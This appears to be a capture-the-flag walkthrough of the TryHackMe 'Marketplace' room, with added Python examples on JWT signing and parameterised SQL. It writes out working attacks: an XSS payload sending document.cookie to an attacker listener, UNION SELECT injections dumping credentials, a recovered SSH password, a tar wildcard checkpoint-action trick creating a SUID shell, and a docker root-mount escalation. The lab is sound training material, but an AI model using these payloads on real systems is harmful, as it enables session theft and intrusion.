# The Marketplace

**Room Link:** <https://tryhackme.com/room/marketplace>

## Initial Scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FH0uRKplzyyqELVPi0Xvi%2Fimage.png?alt=media&#x26;token=920c6dbf-ccec-4045-8d57-98ebb34ff94a" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPC9Dat9oePBtcHetkoo1%2Fimage.png?alt=media&#x26;token=bdf7c3ef-6487-485f-8ba6-bb16b1eb8b73" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

## TCP/32768 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FaVV8RuuffOvMIJFiPg57%2Fimage.png?alt=media&#x26;token=559af160-6893-42a0-9d2a-726d1a197490" alt=""><figcaption></figcaption></figure>

## XSS - Steal JWT

<https://jwt.io/>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FWbZMoREhXQlqN21sTeiK%2Fimage.png?alt=media&#x26;token=ce90a1a4-5574-447a-9dd8-195dc28347cb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FdLMQOIJtPWQtpWg1IHuX%2Fimage.png?alt=media&#x26;token=df05effd-d0ea-45d3-9442-87757cb9c169" alt=""><figcaption></figcaption></figure>

I tried updating the token, but it didn't work.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6QFZrhVhfMrs7hjTloi3%2Fimage.png?alt=media&#x26;token=105f00ab-30c3-4edb-bc40-59db9414c1ff" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfTDfyy804Th4qhSxDeP5%2Fimage.png?alt=media&#x26;token=3a6b37f7-434f-4a4d-abbc-3a01ae922580" alt=""><figcaption></figcaption></figure>

Next we're going to try to steal the JWT from another user.

**Kali**

```
nc -lvnp 4444
```

**Browser**

```
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4zqCv3xWAPq9rrqOM1qx%2Fimage.png?alt=media&#x26;token=3b893665-614a-4640-83bf-79664a8187b8" alt=""><figcaption></figcaption></figure>

This was annoying because if I went to my posts it wouldn't work, so I went to Jake's post and changed the number from 2 to 6 to get to the report page. Then I just clicked the report button.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqcsBEqHy64eDQhnvBkPf%2Fimage.png?alt=media&#x26;token=1f62c578-9835-4038-8719-4638d8ec0690" alt=""><figcaption></figcaption></figure>

We got a token from a user that isn't us.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZME6Me1qI8IO0i4WeCzV%2Fimage.png?alt=media&#x26;token=ae7bd507-414a-4348-9095-c14f37683a8c" alt=""><figcaption></figcaption></figure>

We can see it is from Michael who is an admin.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FlmiYNAgBsIdf30dBG67p%2Fimage.png?alt=media&#x26;token=5b95888d-1b40-42c0-b945-5aac3b248e7e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkLEegabirjD3aQ4Mnix6%2Fimage.png?alt=media&#x26;token=d85a0fc6-f809-4a6a-b092-c5bb277cbb8a" alt=""><figcaption></figcaption></figure>

Sent it again, but this time I just forwarded the request so we could see what that script was doing.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHWcQ2HFpiLU9k2RnDHPg%2Fimage.png?alt=media&#x26;token=4f3648ec-6ed2-434c-abda-2a7ac667f929" alt=""><figcaption></figcaption></figure>

The script was printing the flag.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F0D6iiYOg52UGHRAjj2EC%2Fimage.png?alt=media&#x26;token=a6503a30-8a21-42d1-977e-2ec756eb2c2f" alt=""><figcaption></figcaption></figure>

This wasn't working before, but the next time I tried this box I could just update the cookie from the browser and it worked.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FLkfUG6xAeEzNzqMvz6RM%2Fimage.png?alt=media&#x26;token=aa2b03b9-ee7b-40f8-a176-7434696241a6" alt=""><figcaption></figcaption></figure>

**Browser cookie**

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
```
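Added example, not code from the walkthrough: it decodes the captured token above with the standard library to show the claims the XSS payload exfiltrated (the cookie was readable from `document.cookie`, so it was not `HttpOnly`), and checks the HS256 signature, which is why editing `admin` in the payload without the server's signing secret (the earlier attempt) is rejected. The secrets used are placeholders, not the room's.

```python
import base64
import hashlib
import hmac
import json

# Token captured in the walkthrough above (userId 2, michael, admin true).
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9."
    "O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY"
)

def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def decode_claims(token: str) -> dict:
    """Read the payload WITHOUT checking the signature (what jwt.io displays)."""
    _header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(payload))

def verify_hs256(token: str, secret: bytes) -> bool:
    """True only if the HMAC-SHA256 over 'header.payload' matches under this secret."""
    header, payload, sig = token.split(".")
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint a token the way the server would; used here only to show the check passing."""
    header = _b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"

def set_admin_keep_signature(token: str) -> str:
    """What 'editing the token' in the browser does: new payload, stale signature."""
    header, payload, sig = token.split(".")
    claims = json.loads(_b64url_decode(payload))
    claims["admin"] = True
    new_payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{new_payload}.{sig}"
```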

We add an ORDER BY and increase the number until we get an error, which reveals how many fields the query returns.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHcKYdqZMmwmB65a2onfh%2Fimage.png?alt=media&#x26;token=0356952b-d9e5-436e-95e1-1f628c2c67a7" alt=""><figcaption></figcaption></figure>

After 5 it gives us an error, so we know there are four fields.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FyHBfvudOghcsop0Qmksq%2Fimage.png?alt=media&#x26;token=31ed33b7-9159-45a9-a44a-845ea4d77c56" alt=""><figcaption></figcaption></figure>

We do a UNION SELECT, first trying to show our 1s. This doesn't work because the first part of the statement matches a real row, so there's nowhere for our values to be displayed.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F24BsoVUS8XrdGAPJbkhS%2Fimage.png?alt=media&#x26;token=eefe795b-4b0c-451f-b7fe-5e33b454f0d8" alt=""><figcaption></figcaption></figure>

To work around this we set the user id to 0, which probably doesn't exist, and we start seeing our 1s.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FbD2fi2Qgqud31H3XWzOS%2Fimage.png?alt=media&#x26;token=27f501de-ed81-4bfb-9ca1-99d800ae7056" alt=""><figcaption></figcaption></figure>
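Added example (not part of the original walkthrough) that reproduces the ORDER BY column count and the id=0 UNION trick above against a constructed four-column SQLite table, next to the parameterised query that stops the same input from being read as SQL. The table name, columns and rows are made up for the demo.

```python
import sqlite3

# Constructed stand-in for the marketplace items table: four columns, so
# ORDER BY 4 succeeds and ORDER BY 5 errors, as in the walkthrough.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT, description TEXT, owner TEXT)")
    conn.executemany("INSERT INTO items VALUES (?,?,?,?)",
                     [(1, "Rubber duck", "Squeaks", "jake"),
                      (2, "Laptop", "Slightly used", "michael")])
    return conn

def vulnerable_lookup(conn: sqlite3.Connection, item_id: str) -> list:
    # The bug: the request parameter is spliced straight into the SQL text.
    sql = f"SELECT id, title, description, owner FROM items WHERE id={item_id}"
    return conn.execute(sql).fetchall()

def safe_lookup(conn: sqlite3.Connection, item_id: str) -> list:
    # The fix: a bound parameter. The input is only ever a value, never SQL.
    sql = "SELECT id, title, description, owner FROM items WHERE id=?"
    return conn.execute(sql, (item_id,)).fetchall()

def column_count(conn: sqlite3.Connection) -> int:
    """The ORDER BY probe: the first n that errors means the query has n-1 columns."""
    n = 1
    while True:
        try:
            vulnerable_lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
        n += 1
```

With `id=2` the vulnerable query returns the real row plus the injected one, so a page that renders a single row may hide the 1s; with `id=0` the injected row is the only result, which is the trick used above.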

Get Version

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXUXlpdJtXIOGuKSPDHSt%2Fimage.png?alt=media&#x26;token=98f87391-18d9-4d64-982a-c0e0fbd7ad34" alt=""><figcaption></figcaption></figure>

Get Database

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7STvjxO3aTmrAnTQyPFo%2Fimage.png?alt=media&#x26;token=9bf85bfc-d2e8-4ff3-85a6-c676c017ea80" alt=""><figcaption></figcaption></figure>

Get tables

```
UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXIoNdrNSdv0i97BOBnBG%2Fimage.png?alt=media&#x26;token=2c5abb56-71e1-409c-823b-3ec3695c9387" alt=""><figcaption></figcaption></figure>

Get all tables in one row with group_concat

```
-1 UNION SELECT group_concat(table_name),1,1,1 FROM information_schema.tables WHERE table_schema=database()
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQYooJQTwjWKtA5rc2Bwx%2Fimage.png?alt=media&#x26;token=b8b3bf2e-3f3a-4c5f-b6f8-eeb12a4f2da8" alt=""><figcaption></figcaption></figure>

Get Columns for table users

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM information_schema.columns WHERE table_name='users' AND table_schema='marketplace'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7mMwOG6vLO4y4yrjAmKG%2Fimage.png?alt=media&#x26;token=bfde290b-dbaa-4ca9-aec7-921cf9b89741" alt=""><figcaption></figcaption></figure>

Get Columns for table items

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQWOgeVuNcgxDYey93gp9%2Fimage.png?alt=media&#x26;token=7d4167d7-9ab7-4ca4-b63b-113b0083dc4a" alt=""><figcaption></figcaption></figure>

Get Columns for table messages

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6rVdvxIp4dJCW4QJp7U4%2Fimage.png?alt=media&#x26;token=dc040a96-58d5-4f9a-8fb4-cd6f6deacb77" alt=""><figcaption></figcaption></figure>

Get the contents of table messages

```
-1 UNION SELECT group_concat(message_content),1,1,1 FROM messages
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FhtUqyHDuWbLXchdvUuyL%2Fimage.png?alt=media&#x26;token=9d6b9c1c-4dbd-4d26-afbf-a80f99a47b0d" alt=""><figcaption></figcaption></figure>

Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames.

```
-1 UNION SELECT group_concat(username,'|',password),1,1,1 FROM users
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FuZFfgy04wkUECLaQbiZD%2Fimage.png?alt=media&#x26;token=7068e7cf-104e-47cb-82df-0a36979d0044" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXO9lgBcZ1Ahre2ay8TIS%2Fimage.png?alt=media&#x26;token=287bd107-036e-426b-a205-f0fc136fc754" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F0rachNJugTsOjAA6zTFE%2Fimage.png?alt=media&#x26;token=69c25b15-d098-408c-a980-1f032154eb98" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZYCj1rfvN1B2ctr1wP80%2Fimage.png?alt=media&#x26;token=13649c0f-73fe-416b-80ca-6807a6834bbb" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fv4wuPtZKX7EnnKVFkb9T%2Fimage.png?alt=media&#x26;token=5789e662-01ca-4e67-b6de-34ca8c627ef4" alt=""><figcaption></figcaption></figure>

## **Lateral Movement**

**Exploit:** <https://gtfobins.github.io/gtfobins/tar/>

Jake can run a backup script as michael. The script calls tar with a wildcard, which we can manipulate.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fs6tafkaOUQ9eeqaXRnvV%2Fimage.png?alt=media&#x26;token=ce37e83a-27c7-4b83-a612-c77004bf17e6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FvZTxqQx8iYijlheZOBF7%2Fimage.png?alt=media&#x26;token=a80b1b0e-2f02-4b57-a576-34040958de94" alt=""><figcaption></figcaption></figure>

We can trick the script into running our own command, and so get a shell, by creating empty files whose names tar reads as options.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FWl9ToN58WFPCBokveWbk%2Fimage.png?alt=media&#x26;token=b1286c21-51c7-401e-8b7a-0838108a8484" alt=""><figcaption></figcaption></figure>

**Victim**

```
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh
```

**shell.sh**

```
#!/bin/bash

cp /bin/bash /opt/backups/michealbash;
chmod +xs  /opt/backups/michealbash;
```

**Victim**

```
chmod +x shell.sh 
rm -f ../backup.tar 
sudo -u michael /opt/backups/backup.sh 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXEoYywnZYHk5VTU8bsoM%2Fimage.png?alt=media&#x26;token=e90f4e70-005f-4b9a-9782-dc97c4464cd8" alt=""><figcaption></figcaption></figure>

## **Privilege Escalation**

**Victim (michael)**

```
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh
```

michael is part of the docker group, so it appears we're in a pod.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FMwSxO820UVviBWeHHA5T%2Fimage.png?alt=media&#x26;token=1bd11de8-ba79-4eee-a0fd-120df46bb70f" alt=""><figcaption></figcaption></figure>

There are a few images to choose from. I just ran the last command above and changed the image name until it worked. The exploit worked with the nginx and mysql images as well.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FiphRvBVPrpvoNvlgDv1i%2Fimage.png?alt=media&#x26;token=86d795c0-f1bd-428d-9e0a-3ed058d2e6b0" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FF2Etg70NASOQIPEryn8I%2Fimage.png?alt=media&#x26;token=397cfbac-17ee-44a6-aacc-ae29969fedbc" alt=""><figcaption></figcaption></figure>
